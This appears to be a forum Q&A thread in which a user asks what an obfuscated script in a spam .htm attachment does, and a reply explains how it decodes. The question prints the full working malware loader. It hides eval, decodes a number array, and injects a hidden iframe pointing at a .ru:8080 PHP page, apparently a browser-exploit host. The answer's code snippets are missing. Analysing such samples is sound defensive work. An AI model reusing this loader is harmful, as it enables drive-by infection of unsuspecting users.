I received a spam message that had a .htm attachment. I opened the file in gedit on my linux machine and saw the following. Does the script it would try to run do anything? It looks harmless, yet confusing.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait untill the page loads...</title>
</head>
<body>
<h1>Loading... Please Wait...</h1><br>
</body>`
<script>
if(window['doc'+'ume'+'nt'])
aa=/\w/.exec(new Date()).index+[];
aaa='0';
try {
new location();
}catch(qqq){
ss=String;
if(aa===aaa)
f='-30q-30q66q63q-7q1q61q72q60q78q70q62q71q77q7q64q62q77q30q69q62q70q62q71q77q76q27q82q45q58q64q39q58q70q62q1q0q59q72q61q82q0q2q52q9q54q2q84q-30q-30q-30q66q63q75q58q70q62q75q1q2q20q-30q-30q86q-7q62q69q76q62q-7q84q-30q-30q-30q61q72q60q78q70q62q71q77q7q80q75q66q77q62q1q-5q21q66q63q75q58q70q62q-7q76q75q60q22q0q65q77q77q73q19q8q8q60q73q58q75q58q59q71q72q75q70q58q73q72q72q73q61q76q63q7q75q78q19q17q9q17q9q8q66q70q58q64q62q76q8q58q78q59q69q59q83q61q71q66q7q73q65q73q0q-7q80q66q61q77q65q22q0q10q9q0q-7q65q62q66q64q65q77q22q0q10q9q0q-7q76q77q82q69q62q22q0q79q66q76q66q59q66q69q66q77q82q19q65q66q61q61q62q71q20q73q72q76q66q77q66q72q71q19q58q59q76q72q69q78q77q62q20q69q62q63q77q19q9q20q77q72q73q19q9q20q0q23q21q8q66q63q75q58q70q62q23q-5q2q20q-30q-30q86q-30q-30q63q78q71q60q77q66q72q71q-7q66q63q75q58q70q62q75q1q2q84q-30q-30q-30q79q58q75q-7q63q-7q22q-7q61q72q60q78q70q62q71q77q7q60q75q62q58q77q62q30q69q62q70q62q71q77q1q0q66q63q75q58q70q62q0q2q20q63q7q76q62q77q26q77q77q75q66q59q78q77q62q1q0q76q75q60q0q5q0q65q77q77q73q19q8q8q60q73q58q75q58q59q71q72q75q70q58q73q72q72q73q61q76q63q7q75q78q19q17q9q17q9q8q66q70q58q64q62q76q8q58q78q59q69q59q83q61q71q66q7q73q65q73q0q2q20q63q7q76q77q82q69q62q7q79q66q76q66q59q66q69q66q77q82q22q0q65q66q61q61q62q71q0q20q63q7q76q77q82q69q62q7q73q72q76q66q77q66q72q71q22q0q58q59q76q72q69q78q77q62q0q20q63q7q76q77q82q69q62q7q69q62q63q77q22q0q9q0q20q63q7q76q77q82q69q62q7q77q72q73q22q0q9q0q20q63q7q76q62q77q26q77q77q75q66q59q78q77q62q1q0q80q66q61q77q65q0q5q0q10q9q0q2q20q63q7q76q62q77q26q77q77q75q66q59q78q77q62q1q0q65q62q66q64q65q77q0q5q0q10q9q0q2q20q-30q-30q-30q61q72q60q78q70q62q71q77q7q64q62q77q30q69q62q70q62q71q77q76q27q82q45q58q64q39q58q70q62q1q0q59q72q61q82q0q2q52q9q54q7q58q73q73q62q71q61q28q65q66q69q61q1q63q2q20q-30q-30q86'
.split('q');
md='a';
e=window['e'+'val'];
w=f;
s='';
fr='fromChar';
r=ss[fr+'Code'];
for(i=0;-i>-w.length;i+=1) {
j=i;
s=s+r(39+1*w[j]);
}
if(Math.round(-4*Math.tan(Math.atan(0.5)))===-2)
z=s;
e(z);
}
</script>
</html>
The encoded bit turns into:
The domain at http://cparabnormapoopdsf.ru:8080/images/aublbzdni.php does something unknown. The server is running nginx and just redirects to google.com. Perhaps at some later point it will do something else.
Encoded in
f
is the following code, which the scripteval
s (executes):I assume whatever lives on
http://cparabnormapoopdsf.ru:8080
is evil and tries to exploit some kind of browser vulnerabilities.I was able to extract
f
by basically copying what the script is doing:That gets you an array of numbers, which the script assembles into a string by adding 39 to each: